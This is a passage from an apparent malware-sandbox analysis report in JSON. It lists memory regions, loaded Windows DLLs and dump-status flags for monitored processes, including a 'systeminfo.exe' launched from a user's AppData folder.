maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1870", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:08.734", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_1871", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:08.734", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_1872", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:01:08.734", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 114688, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4308991, "entry_point": 0, "filename": null, "id": "region_1876", "name": "private_0x0000000000400000", "norm_filename": null, "region_type": "private_memory", "start_va": 4194304, "timestamp": "00:01:08.742", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 6029312, "type": "region", "version": 1 }, "end_va": 6553599, "entry_point": 0, "filename": null, "id": "region_1877", "name": "private_0x00000000005c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 6029312, "timestamp": "00:01:08.748", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1953366016, "type": "region", "version": 1 }, "end_va": 1953398783, "entry_point": 1953374456, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_1878", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1953366016, "timestamp": "00:01:08.748", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1953431552, "type": "region", "version": 1 }, "end_va": 1953808383, "entry_point": 1953691544, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_1879", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1953431552, "timestamp": "00:01:08.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1953824768, "type": "region", "version": 1 }, "end_va": 1954082815, "entry_point": 1954012792, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_1880", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1953824768, "timestamp": "00:01:08.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1881", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:08.772", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 880639, "entry_point": 458752, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1882", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 458752, "timestamp": "00:01:08.772", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 1048576, "type": "region", "version": 1 }, "end_va": 1114111, "entry_point": 0, "filename": null, "id": "region_1883", "name": "private_0x0000000000100000", "norm_filename": null, "region_type": "private_memory", "start_va": 1048576, "timestamp": "00:01:08.772", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 8257536, "type": "region", "version": 1 }, "end_va": 9306111, "entry_point": 0, "filename": null, "id": "region_1884", "name": "private_0x00000000007e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 8257536, "timestamp": "00:01:08.772", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1695744, "start_va": 1949237248, "type": "region", "version": 1 }, "end_va": 1950932991, "entry_point": 1949427381, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "id": "region_1885", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 1949237248, "timestamp": "00:01:08.772", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1960574976, "type": "region", "version": 1 }, "end_va": 1960624127, "entry_point": 1960579297, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_1886", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1960574976, "timestamp": "00:01:08.773", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1960640512, "type": "region", "version": 1 }, "end_va": 1961033727, "entry_point": 1960747955, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_1887", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1960640512, "timestamp": "00:01:08.773", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1961426944, "type": "region", "version": 1 }, "end_va": 1961529343, "entry_point": 1961445749, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_1888", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1961426944, "timestamp": "00:01:08.774", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1963786240, "type": "region", "version": 1 }, "end_va": 1964142591, "entry_point": 1963891622, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_1889", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1963786240, "timestamp": "00:01:08.774", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 1964179456, "type": "region", "version": 1 }, "end_va": 1964769279, "entry_point": 1964270403, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_1890", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1964179456, "timestamp": "00:01:08.775", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1965359104, "type": "region", "version": 1 }, "end_va": 1965645823, "entry_point": 1965388920, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_1891", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1965359104, "timestamp": "00:01:08.775", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1965686784, "type": "region", "version": 1 }, "end_va": 1966391295, "entry_point": 1965728882, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_1892", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1965686784, "timestamp": "00:01:08.775", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1967456256, "type": "region", "version": 1 }, "end_va": 1968881663, "entry_point": 1967766077, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_1893", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1967456256, "timestamp": "00:01:08.778", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1968898048, "type": "region", "version": 1 }, "end_va": 1969541119, "entry_point": 1969110999, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_1894", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1968898048, "timestamp": "00:01:08.778", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1970143232, "type": "region", "version": 1 }, "end_va": 1970798591, "entry_point": 1970227685, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_1895", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1970143232, "timestamp": "00:01:08.778", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1970798592, "type": "region", "version": 1 }, "end_va": 1970839551, "entry_point": 1970812576, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_1896", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1970798592, "timestamp": "00:01:08.779", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1970864128, "type": "region", "version": 1 }, "end_va": 1971912703, "entry_point": 1970976493, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_1897", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1970864128, "timestamp": "00:01:08.779", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1973354496, "type": "region", "version": 1 }, "end_va": 1974468607, "entry_point": 1973433043, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_1898", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1973354496, "timestamp": "00:01:08.780", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 503808, "start_va": 1975320576, "type": "region", "version": 1 }, "end_va": 1975824383, "entry_point": 1975327470, "filename": "\\Windows\\SysWOW64\\comdlg32.dll", "id": "region_1899", "name": "comdlg32.dll", "norm_filename": "c:\\windows\\syswow64\\comdlg32.dll", "region_type": "memory_mapped_file", "start_va": 1975320576, "timestamp": "00:01:08.780", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1975844864, "type": "region", "version": 1 }, "end_va": 1988730879, "entry_point": 1976374785, "filename": "\\Windows\\SysWOW64\\shell32.dll", "id": "region_1900", "name": "shell32.dll", "norm_filename": "c:\\windows\\syswow64\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1975844864, "timestamp": "00:01:08.781", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1993867264, "type": "region", "version": 1 }, "end_va": 1994850303, "entry_point": 1993934185, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_1901", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1993867264, "timestamp": "00:01:08.781", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 1994850304, "type": "region", "version": 1 }, "end_va": 1995874303, "entry_point": 0, "filename": null, "id": "region_1902", "name": "private_0x0000000076e70000", "norm_filename": null, "region_type": "private_memory", "start_va": 1994850304, "timestamp": "00:01:08.782", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 1995898880, "type": "region", "version": 1 }, "end_va": 1997074431, "entry_point": 0, "filename": null, "id": "region_1903", "name": "private_0x0000000076f70000", "norm_filename": null, "region_type": "private_memory", "start_va": 1995898880, "timestamp": "00:01:08.782", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_1904", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:08.782", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1905", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:08.782", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 4325376, "type": "region", "version": 1 }, "end_va": 5931007, "entry_point": 0, "filename": null, "id": "region_1912", "name": "pagefile_0x0000000000420000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4325376, "timestamp": "00:01:08.887", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1961033728, "type": "region", "version": 1 }, "end_va": 1961426943, "entry_point": 1961104783, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_1913", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1961033728, "timestamp": "00:01:08.887", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1974468608, "type": "region", "version": 1 }, "end_va": 1975304191, "entry_point": 1974474379, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_1914", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1974468608, "timestamp": "00:01:08.889", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1915", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:08.941", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 200703, "entry_point": 0, "filename": null, "id": "region_1916", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:08.941", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 991231, "entry_point": 0, "filename": null, "id": "region_1917", "name": "pagefile_0x00000000000f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 983040, "timestamp": "00:01:08.941", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 6553600, "type": "region", "version": 1 }, "end_va": 8130559, "entry_point": 0, "filename": null, "id": "region_1918", "name": "pagefile_0x0000000000640000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6553600, "timestamp": "00:01:08.941", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 12582912, "type": "region", "version": 1 }, "end_va": 33554431, "entry_point": 0, "filename": null, "id": "region_1919", "name": "pagefile_0x0000000000c00000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 12582912, "timestamp": "00:01:08.942", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 921599, "entry_point": 0, "filename": null, "id": "region_1925", "name": "pagefile_0x00000000000e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 917504, "timestamp": "00:01:08.967", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 9306112, "type": "region", "version": 1 }, "end_va": 10354687, "entry_point": 0, "filename": null, "id": "region_1926", "name": "private_0x00000000008e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 9306112, "timestamp": "00:01:08.967", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 33554432, "type": "region", "version": 1 }, "end_va": 36499455, "entry_point": 33554432, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_1929", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 33554432, "timestamp": "00:01:08.979", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1947533312, "type": "region", "version": 1 }, "end_va": 1947586559, "entry_point": 1947533312, "filename": "\\Windows\\SysWOW64\\pstorec.dll", "id": "region_1931", "name": "pstorec.dll", "norm_filename": "c:\\windows\\syswow64\\pstorec.dll", "region_type": "memory_mapped_file", "start_va": 1947533312, "timestamp": "00:01:09.018", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 81920, "start_va": 1947402240, "type": "region", "version": 1 }, "end_va": 1947484159, "entry_point": 1947402240, "filename": "\\Windows\\SysWOW64\\atl.dll", "id": "region_1932", "name": "atl.dll", "norm_filename": "c:\\windows\\syswow64\\atl.dll", "region_type": "memory_mapped_file", "start_va": 1947402240, "timestamp": "00:01:09.042", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 3538944, "type": "region", "version": 1 }, "end_va": 3801087, "entry_point": 0, "filename": null, "id": "region_2170", "name": "private_0x0000000000360000", "norm_filename": null, "region_type": "private_memory", "start_va": 3538944, "timestamp": "00:01:14.174", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 37093376, "type": "region", "version": 1 }, "end_va": 38141951, "entry_point": 0, "filename": null, "id": "region_2171", "name": "private_0x0000000002360000", "norm_filename": null, "region_type": "private_memory", "start_va": 37093376, "timestamp": "00:01:14.174", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_2172", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:01:14.174", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1167360, "start_va": 1972174848, "type": "region", "version": 1 }, "end_va": 1973342207, "entry_point": 1972180362, "filename": "\\Windows\\SysWOW64\\crypt32.dll", "id": "region_2173", "name": "crypt32.dll", "norm_filename": "c:\\windows\\syswow64\\crypt32.dll", "region_type": "memory_mapped_file", "start_va": 1972174848, "timestamp": "00:01:14.175", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1963720704, "type": "region", "version": 1 }, "end_va": 1963769855, "entry_point": 1963729806, "filename": "\\Windows\\SysWOW64\\msasn1.dll", "id": "region_2174", "name": "msasn1.dll", "norm_filename": "c:\\windows\\syswow64\\msasn1.dll", "region_type": "memory_mapped_file", "start_va": 1963720704, "timestamp": "00:01:14.176", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\systeminfo.exe\" ", "filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\systeminfo.exe", "id": "proc_13", "image_name": "systeminfo.exe", "monitor_reason": "autostart", "monitored_id": 13, "origin_monitor_id": 0, "ref_parent_process": null, "regions": [ { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_2449", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:49.468", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_2450", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:49.468", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_2451", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:01:49.468", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_2452", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:01:49.471", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 401407, "entry_point": 0, "filename": null, "id": "region_2453", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:01:49.471", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 720896, "type": "region", "version": 1 }, "end_va": 983039, "entry_point": 0, "filename": null, "id": "region_2454", "name": "private_0x00000000000b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 720896, "timestamp": "00:01:49.471", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 3473407, "entry_point": 0, "filename": null, "id": "region_2455", "name": "private_0x0000000000250000", "norm_filename": null, "region_type": "private_memory", "start_va": 2424832, "timestamp": "00:01:49.471", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 3997696, "type": "region", "version": 1 }, "end_va": 4124671, "entry_point": 3997696, "filename": "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\systeminfo.exe", "id": "region_2456", "name": "systeminfo.exe", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\systeminfo.exe", "region_type": "memory_mapped_file", "start_va": 3997696, "timestamp": "00:01:49.471", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 1994326016, "type": "region", "version": 1 }, "end_va": 1996066815, "entry_point": 1994326016, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_2457", "name": "ntdll.dll", "norm_filename": 